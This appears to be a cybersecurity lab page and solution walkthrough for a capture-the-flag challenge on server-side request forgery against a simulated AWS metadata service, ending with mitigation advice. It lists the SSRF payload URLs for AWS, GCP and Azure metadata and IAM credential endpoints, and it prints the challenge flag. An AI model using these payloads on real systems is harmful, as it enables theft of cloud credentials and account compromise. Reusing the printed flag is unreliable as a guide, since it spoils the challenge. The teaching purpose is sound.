Labs / URL Scanner
- Daily Challenge
- Released 06 Aug 2025
🔍 Can you scan what you're not supposed to see?
🎯 Master Server-Side Request Forgery (SSRF) attacks and internal network reconnaissance techniques
🛠️ Learn to exploit URL scanning services and discover hidden internal administrative endpoints
📊 SSRF vulnerabilities affect 67% of web applications that process user-provided URLs
🚀 Enhance your penetration testing toolkit with advanced server-side exploitation techniques
1
Flags
1
Points
Daily Challenge
Solution Available
Pro Exclusive
Start Lab Environment
~1-2 min setup
AWS dedicated
Private instance
Industry standard
Daily Challenge
URL Scanner - Complete SSRF to AWS Metadata Solution
Understanding SSRF and AWS Metadata
Server-Side Request Forgery (SSRF) vulnerabilities allow attackers to make HTTP requests from the server to internal services. One of the most critical targets in cloud environments is the AWS EC2 metadata service at 169.254.169.254, which can expose IAM credentials, instance information, and other sensitive data.
Step 1: Initial Reconnaissance
- Access the URL scanner: Navigate to
http://<target-ip>to access the SecureScan Pro service (hosted on port 80) - Test normal functionality: Try scanning a legitimate external URL like https://example.com
- Observe the response: Note the detailed information returned (headers, status, content preview)
- Analyze the request pattern: Understand how the service processes and displays URL content
Normal Request Example:
URL: https://example.com
Response: Shows headers, status code, content preview, server information
Deployment Architecture: The challenge runs on port 80 via nginx proxy, with the Flask app internally on port 8080 and the AWS metadata simulator on port 8081
URL: https://example.com
Response: Shows headers, status code, content preview, server information
Deployment Architecture: The challenge runs on port 80 via nginx proxy, with the Flask app internally on port 8080 and the AWS metadata simulator on port 8081
Step 2: Testing for SSRF - AWS Metadata Discovery
Test AWS Metadata Endpoints
- Test AWS metadata access: Try scanning the well-known AWS metadata endpoints
Test URLs:
http://169.254.169.254/
http://169.254.169.254/latest/
http://169.254.169.254/latest/meta-data/- Discover AWS metadata service: Try the well-known AWS metadata endpoint
http://169.254.169.254/latest/
http://169.254.169.254/latest/meta-data/Step 3: Exploring AWS Metadata Structure
- Access metadata root: Start with the basic metadata endpoint
URL: http://169.254.169.254/latest/meta-data/- Explore available endpoints: You'll see a list like:
ami-id
hostname
instance-id
instance-type
local-hostname
local-ipv4
public-hostname
public-ipv4
security-groups
iam/- Focus on IAM endpoints: The most sensitive data is usually in IAM credentials
Key Insight: AWS metadata often contains sensitive IAM credentials that can be used for privilege escalation and lateral movement in cloud environments.
Step 4: Extracting IAM Credentials and Flag
- Access IAM security credentials: Navigate to the IAM endpoints
Step 1: http://169.254.169.254/latest/meta-data/iam/
Step 2: http://169.254.169.254/latest/meta-data/iam/security-credentials/
Step 3: http://169.254.169.254/latest/meta-data/iam/security-credentials/WebServerRole- Extract the credentials: The final endpoint contains the flag embedded in the JSON response
- Flag location: Look for the 'Challenge_Flag' field in the IAM credentials JSON
- Flag format: UUID format (117c287d-efb6-4e42-9292-51e180367855)
Expected JSON Response:
{
"Code" : "Success",
"LastUpdated" : "2025-08-06T12:00:00Z",
"Type" : "AWS-HMAC",
"AccessKeyId" : "AKIA...",
"SecretAccessKey" : "wJalrXUtnFEMI...",
"Token" : "AQoDYXdzEJr...",
"Expiration" : "2025-08-06T18:00:00Z",
"Challenge_Flag" : "117c287d-efb6-4e42-9292-51e180367855",
"Note" : "SSRF Challenge Completed!"
}Flag:
117c287d-efb6-4e42-9292-51e180367855Step 5: Alternative Attack Methods
Method 1: Direct Path Access
http://169.254.169.254/latest/meta-data/iam/security-credentials/WebServerRoleMethod 2: Explore Other Metadata
http://169.254.169.254/latest/user-data (instance startup script)
http://169.254.169.254/latest/meta-data/instance-id
http://169.254.169.254/latest/meta-data/security-groupsMethod 3: Real-World AWS Metadata
http://169.254.169.254/latest/meta-data/ (real AWS)
http://metadata.google.internal/computeMetadata/v1/ (GCP)
http://169.254.169.254/metadata/instance (Azure)Understanding AWS Metadata Exposure
- IAM credential theft: AWS metadata exposes temporary security credentials for the instance role
- Instance information: Detailed system information about the EC2 instance
- User data exposure: Startup scripts and configuration data
- Security group info: Network security configuration details
- Cross-service access: Credentials can be used to access other AWS services
- Privilege escalation: Stolen IAM credentials may have broader permissions than expected
Real-World SSRF to AWS Metadata Impact
- Complete AWS account compromise: IAM credentials can access S3, RDS, Lambda, and other services
- Data exfiltration: Access to private S3 buckets and databases
- Infrastructure manipulation: Creating/deleting resources, modifying security groups
- Lateral movement: Using credentials to access other EC2 instances or services
- Cost manipulation: Launching expensive resources or crypto mining instances
- Compliance violations: Access to sensitive data without authorization
Prevention and Mitigation
- Block metadata endpoints: Explicitly block access to 169.254.169.254 in applications
- Use IMDSv2: Configure instances to require token-based metadata requests
- Principle of least privilege: Minimize IAM role permissions on EC2 instances
- Network segmentation: Isolate applications from sensitive internal services
- Input validation: Whitelist allowed domains and IP ranges
- WAF rules: Block requests to internal IP ranges and metadata endpoints
- Monitoring: Alert on unusual metadata service access patterns
Technical Analysis of This Challenge
- Vulnerability type: Server-Side Request Forgery (SSRF) targeting AWS metadata simulation
- Root cause: No URL validation or filtering in the scanning service
- Attack method: Direct request to simulated AWS metadata endpoints
- Target service: AWS metadata service at 169.254.169.254 (intercepted and simulated)
- Flag location: Embedded in IAM security credentials JSON response
- Educational value: Demonstrates real-world cloud security attack vectors
Challenge Summary
This SSRF challenge demonstrates one of the most critical attack vectors in cloud environments: exploiting SSRF vulnerabilities to access AWS EC2 metadata services. By simulating the AWS metadata endpoint structure, the challenge teaches how attackers can steal IAM credentials, instance information, and other sensitive cloud configuration data. Understanding this attack vector is crucial for securing cloud applications and implementing proper SSRF protections in AWS environments.